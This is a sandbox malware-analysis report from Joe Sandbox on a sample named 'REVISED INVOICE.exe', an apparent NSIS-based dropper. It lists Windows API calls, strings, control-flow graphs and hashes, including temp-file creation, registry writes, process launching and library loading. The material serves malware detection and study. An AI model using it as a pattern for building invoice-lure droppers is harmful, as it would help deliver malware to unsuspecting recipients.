                                                                                                  • Part of subcall function 00405F66: wsprintfW.USER32 ref: 00405F73
                                                                                                • RegisterClassW.USER32(004281C0), ref: 00403A0D
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A25
                                                                                                • CreateWindowExW.USER32 ref: 00403A5A
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403A90
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004281C0), ref: 00403ABC
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,004281C0), ref: 00403AC9
                                                                                                • RegisterClassW.USER32(004281C0), ref: 00403AD2
                                                                                                • DialogBoxParamW.USER32 ref: 00403AF1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: "C:\Users\user\Desktop\REVISED INVOICE.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\fona\Kvit$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$antireform
                                                                                                • API String ID: 1975747703-182827311
                                                                                                • Opcode ID: db80b2588597b3e26acc2e4c4de499a3f9846f615b8d16b47e4426e139c46013
                                                                                                • Instruction ID: 2be98759588b12f3ea5babf1b6ec1a1322f2c31473ef1d4f92accd895ea03b39
                                                                                                • Opcode Fuzzy Hash: db80b2588597b3e26acc2e4c4de499a3f9846f615b8d16b47e4426e139c46013
                                                                                                • Instruction Fuzzy Hash: C861A670644200BAD220AF669D45F3B3A6CEB84749F80457FF941B22E2CB7C6D01CA7E

Control-flow Graph

Control-flow graph for the function at 00402DEE (graph image not reproduced; the API calls it makes are listed below).
APIs
• GetTickCount.KERNEL32(7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe",?,?,00000000,00403504,?), ref: 00402DFF
• GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,00000000,00403504,?), ref: 00402E1B
  • Part of subcall function 00405BF4: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
  • Part of subcall function 00405BF4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1A
• GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00402E67
Strings
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
• C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
• "C:\Users\user\Desktop\REVISED INVOICE.exe", xrefs: 00402DF4
• C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
• Null, xrefs: 00402EE5
• Inst, xrefs: 00402ED3
• Error launching installer, xrefs: 00402E3E
• soft, xrefs: 00402EDC
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\REVISED INVOICE.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 4283519449-253936284
• Opcode ID: 5c453212d903dc701faa49355209661bb92ff5e6ac37f0c8ac23110231670f15
• Instruction ID: cad0cac5a7d3da6b721da94722abfb33afad8597fd9771d3107dd1117b6c1d4f
• Opcode Fuzzy Hash: 5c453212d903dc701faa49355209661bb92ff5e6ac37f0c8ac23110231670f15
• Instruction Fuzzy Hash: EA51D471901216ABDB209F64DE89B9E7BB8EB04354F20407BF904F62D1C7BC9D419BAD

Control-flow Graph

Control-flow graph for the function at 00401767 (graph image not reproduced; the API calls it makes are listed below).
APIs
• lstrcatW.KERNEL32(00000000,00000000,%sortimentsboghandler%\Cacodemonia\Kimbladene,C:\Users\user\AppData\Local\fona\Kvit,?,?,00000031), ref: 004017A8
• CompareFileTime.KERNEL32(-00000014,?,%sortimentsboghandler%\Cacodemonia\Kimbladene,%sortimentsboghandler%\Cacodemonia\Kimbladene,00000000,00000000,%sortimentsboghandler%\Cacodemonia\Kimbladene,C:\Users\user\AppData\Local\fona\Kvit,?,?,00000031), ref: 004017CD
  • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
  • Part of subcall function 0040517E: lstrlenW.KERNEL32(004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
  • Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
  • Part of subcall function 0040517E: lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,0040FEC0,00000000), ref: 004051D9
  • Part of subcall function 0040517E: SetWindowTextW.USER32(004216E8,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160), ref: 004051EB
  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
  • Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
Strings
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: %sortimentsboghandler%\Cacodemonia\Kimbladene$C:\Users\user\AppData\Local\fona\Kvit$brandenes\opinionsdanner\Dagsudflugt$open C:\Users\user\Desktop\bhabar\biffins.Unr
• API String ID: 1941528284-1116174614
• Opcode ID: fa6c9ee85054582e6053dcadd9bdeda21757e8bc23449a0a696a8e9d1f30f139
• Instruction ID: e39dfb19bb2720adffc224853af95c022162de9bd11196ce21bc9617d3384428
• Opcode Fuzzy Hash: fa6c9ee85054582e6053dcadd9bdeda21757e8bc23449a0a696a8e9d1f30f139
• Instruction Fuzzy Hash: 9041D571900515BACF20BFB5CC45DAF3679EF45328B20427BF422B50E2DB3C8A519A6D

Control-flow Graph

Control-flow graph for the function at 00403027 (graph image not reproduced; the API calls it makes are listed below).
APIs
• GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00403088
• GetTickCount.KERNEL32(0040BEC0,00004000), ref: 00403109
• MulDiv.KERNEL32 ref: 00403136
• wsprintfW.USER32 ref: 00403149
Strings
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
Similarity
• API ID: CountTick$wsprintf
• String ID: ... %d%%
• API String ID: 551687249-2449383134
• Opcode ID: cf664cf4806fb32f7aca161fbd37ecbefe006222c1d77f285591627fdb242337
• Instruction ID: dc339ecebd5a12fc0f5e273b782e0acc65c92b35cb5ec2ffb99f959b3dc2fe49
• Opcode Fuzzy Hash: cf664cf4806fb32f7aca161fbd37ecbefe006222c1d77f285591627fdb242337
• Instruction Fuzzy Hash: CC517A71900219ABDB10DF65D904B9F3FA8AF04766F14427BF911BB2C5C7789E408BE9

Control-flow Graph

Control-flow graph for the function at 0040237B (graph image not reproduced; the API calls it makes are listed below).
APIs
• RegCreateKeyExW.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 004023B9
• lstrlenW.KERNEL32(brandenes\opinionsdanner\Dagsudflugt,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
• RegSetValueExW.KERNEL32 ref: 00402415
• RegCloseKey.KERNEL32(?), ref: 004024F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
Similarity
• API ID: CloseCreateValuelstrlen
• String ID: brandenes\opinionsdanner\Dagsudflugt
• API String ID: 1356686001-563703398
• Opcode ID: 66f48faa1bab367393d480de5df591319f7b291825b04af0d9622cff9ca73f92
• Instruction ID: 7111b63e716528206d7143fef0c5d48aa4ff5df43585b472b347a68cc626e816
• Opcode Fuzzy Hash: 66f48faa1bab367393d480de5df591319f7b291825b04af0d9622cff9ca73f92
• Instruction Fuzzy Hash: 5B11AE71E00108BFEB10EFA4DD89DAE76BCEB04358F10403AF904B21D1D6B85E419628

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 781 402bff-402c28 RegOpenKeyExW 782 402c93-402c97 781->782 783 402c2a-402c35 781->783 784 402c50-402c60 RegEnumKeyW 783->784 785 402c62-402c74 RegCloseKey call 4063f5 784->785 786 402c37-402c3a 784->786 794 402c76-402c85 785->794 795 402c9a-402ca0 785->795 787 402c87-402c8a RegCloseKey 786->787 788 402c3c-402c4e call 402bff 786->788 792 402c90-402c92 787->792 788->784 788->785 792->782 794->782 795->792 796 402ca2-402cb0 RegDeleteKeyW 795->796 796->792 797 402cb2 796->797 797->782
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32 ref: 00402C20
                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                Similarity
                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1912718029-0
                                                                                                • Opcode ID: 2793c90fd49a5e1b605453f73a61c738209944c63e67e711cf318bb8db1452b8
                                                                                                • Instruction ID: 783455ef39ba97bad4d92773a6bd33e03ba47aaf13af7a3f43d32fd345691cd1
                                                                                                • Opcode Fuzzy Hash: 2793c90fd49a5e1b605453f73a61c738209944c63e67e711cf318bb8db1452b8
                                                                                                • Instruction Fuzzy Hash: 52115971908118FEEF119F90DE8CEAE3B79FB14384F100476FA05A10A0D3B49E52AA69

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 799 401bdf-401bf7 call 402ba2 * 2 804 401c03-401c07 799->804 805 401bf9-401c00 call 402bbf 799->805 807 401c13-401c19 804->807 808 401c09-401c10 call 402bbf 804->808 805->804 811 401c1b-401c2f call 402ba2 * 2 807->811 812 401c5f-401c89 call 402bbf * 2 FindWindowExW 807->812 808->807 822 401c31-401c4d SendMessageTimeoutW 811->822 823 401c4f-401c5d SendMessageW 811->823 824 401c8f 812->824 825 401c92-401c95 822->825 823->824 824->825 826 401c9b 825->826 827 402a4c-402a5b 825->827 826->827
                                                                                                APIs
                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Timeout
                                                                                                • String ID: !
                                                                                                • API String ID: 1777923405-2657877971
                                                                                                • Opcode ID: 89185f19cab5c9d2123c9567e553a40f312bc8837cbfc1fecf3123f783c5ad12
                                                                                                • Instruction ID: a67f43666b390050b7c93cc16dc22df3288c4645dfbd1c9967af83c22614668d
                                                                                                • Opcode Fuzzy Hash: 89185f19cab5c9d2123c9567e553a40f312bc8837cbfc1fecf3123f783c5ad12
                                                                                                • Instruction Fuzzy Hash: 7C21B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A409B69

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 830 405eec-405f1e RegOpenKeyExW 831 405f60-405f63 830->831 832 405f20-405f3f RegQueryValueExW 830->832 833 405f41-405f45 832->833 834 405f4d 832->834 835 405f50-405f5a RegCloseKey 833->835 836 405f47-405f4b 833->836 834->835 835->831 836->834 836->835
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32 ref: 00405F16
                                                                                                • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?), ref: 00405F37
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00405F5A
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: antireform
                                                                                                • API String ID: 3677997916-466533878
                                                                                                • Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                                • Instruction ID: c601889377c76b9115debbe7433e53646a10130b96f6f591fa827391142cde11
                                                                                                • Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                                • Instruction Fuzzy Hash: 26010C3255020AEADB218F65ED09E9B3BACEF44350B004026F919D6260D735D964DFA5

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 837 405c23-405c2f 838 405c30-405c64 GetTickCount GetTempFileNameW 837->838 839 405c73-405c75 838->839 840 405c66-405c68 838->840 842 405c6d-405c70 839->842 840->838 841 405c6a 840->841 841->842
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32(7570D4C4,C:\Users\user\AppData\Local\Temp\,?,?,00000000,00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00405C41
                                                                                                • GetTempFileNameW.KERNELBASE(00409300,?,00000000,?,?,?,00000000,00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00405C5C
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                • API String ID: 1716503409-4262883142
                                                                                                • Opcode ID: f059ee56c8deccd03f6e154050eb187f2ccb3477461fa331799173a8e43ad9ef
                                                                                                • Instruction ID: 4fdac09ee551a982241d11f866b864b283b1b610f450d112551ccb25b2c02e5c
                                                                                                • Opcode Fuzzy Hash: f059ee56c8deccd03f6e154050eb187f2ccb3477461fa331799173a8e43ad9ef
                                                                                                • Instruction Fuzzy Hash: 0EF03676B04208BFEB108F55DD49E9BB7ADEB95750F10403AF901F7150E6B0AE548758

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 843 406389-4063a9 GetSystemDirectoryW 844 4063ab 843->844 845 4063ad-4063af 843->845 844->845 846 4063c0-4063c2 845->846 847 4063b1-4063ba 845->847 849 4063c3-4063f2 wsprintfW LoadLibraryW 846->849 847->846 848 4063bc-4063be 847->848 848->849
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104,00000020), ref: 004063A0
                                                                                                • wsprintfW.USER32 ref: 004063DB
                                                                                                • LoadLibraryW.KERNEL32(?), ref: 004063EB
                                                                                                Similarity
                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                • String ID: %s%S.dll
                                                                                                • API String ID: 2200240437-2744773210
                                                                                                • Opcode ID: 8eb02a3bbd68b69db90ac38405ec0e3d1a99f1663c9491293569e02019d06da0
                                                                                                • Instruction ID: 006adf5c24d44cc190f28e383f23d96ea846dcb1794efbef959ff2cbc64c9496
                                                                                                • Opcode Fuzzy Hash: 8eb02a3bbd68b69db90ac38405ec0e3d1a99f1663c9491293569e02019d06da0
                                                                                                • Instruction Fuzzy Hash: D6F09030910119EBDB14AB68DD4DEAB366CAB00304F104476A906F21E1E77CEA68CBE9
                                                                                                APIs
                                                                                                  • Part of subcall function 0040517E: lstrlenW.KERNEL32(004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                                                  • Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                                                  • Part of subcall function 0040517E: lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,0040FEC0,00000000), ref: 004051D9
                                                                                                  • Part of subcall function 0040517E: SetWindowTextW.USER32(004216E8,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160), ref: 004051EB
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                                                  • Part of subcall function 004056FF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
                                                                                                  • Part of subcall function 004056FF: CloseHandle.KERNEL32(00409300), ref: 00405735
                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                • CloseHandle.KERNEL32(?), ref: 00401EDE
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 3585118688-0
APIs
  • Part of subcall function 00405A7E: CharNextW.USER32(?), ref: 00405A8C
  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
  • Part of subcall function 0040564D: CreateDirectoryW.KERNEL32(?,00409300,C:\Users\user\AppData\Local\Temp\), ref: 00405690
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\fona\Kvit,?,00000000,000000F0), ref: 00401645
Strings
• C:\Users\user\AppData\Local\fona\Kvit, xrefs: 00401638
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Local\fona\Kvit
• API String ID: 1892508949-989027284
APIs
• IsWindowVisible.USER32(?), ref: 00405121
• CallWindowProcW.USER32(?,?,?,?), ref: 00405172
  • Part of subcall function 0040412F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141
Strings
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
• CloseHandle.KERNEL32(00409300), ref: 00405735
Strings
• Error launching installer, xrefs: 00405712
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
                                                                                                • API String ID:
                                                                                                • Opcode ID: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
                                                                                                • Instruction ID: 02d0d75cb83947f83aad45c50880e4a386b83e744e149296eb7fa161ab999f08
                                                                                                • Opcode Fuzzy Hash: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
                                                                                                • Instruction Fuzzy Hash: 08714671E00219CFDF24CFA8C844BADBBB1FB44305F15806AD856BB290C7385956DF44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
                                                                                                • Instruction ID: eb15c3353e008649bdc799d0a197d89dfb60748dd6a42a5e4cae05a50034cddc
                                                                                                • Opcode Fuzzy Hash: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
                                                                                                • Instruction Fuzzy Hash: 67714571E00229DBDF28CF98C844BADBBB1FF44305F11806AD956BB291C7789A66DF44
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                  • Part of subcall function 0040517E: lstrlenW.KERNEL32(004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                                                  • Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                                                  • Part of subcall function 0040517E: lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,0040FEC0,00000000), ref: 004051D9
                                                                                                  • Part of subcall function 0040517E: SetWindowTextW.USER32(004216E8,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160), ref: 004051EB
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 334405425-0
                                                                                                • Opcode ID: 601e69b8988a7be783b9bf71a199474bccdecbb6df60d32c779fdf807402afc7
                                                                                                • Instruction ID: 21b843afec6b7294a3944f79e0bc8b5a0bfae5b7739fd4420ef7f1bee797e933
                                                                                                • Opcode Fuzzy Hash: 601e69b8988a7be783b9bf71a199474bccdecbb6df60d32c779fdf807402afc7
                                                                                                • Instruction Fuzzy Hash: D0219531904219FBCF20AFA5CE48A9E7EB1AF00354F60427BF500B51E1C7B98E81DA5E
                                                                                                APIs
                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNEL32 ref: 00402CF1
                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004024E0
                                                                                                • RegCloseKey.KERNEL32(?), ref: 004024F6
                                                                                                Memory Dump Source
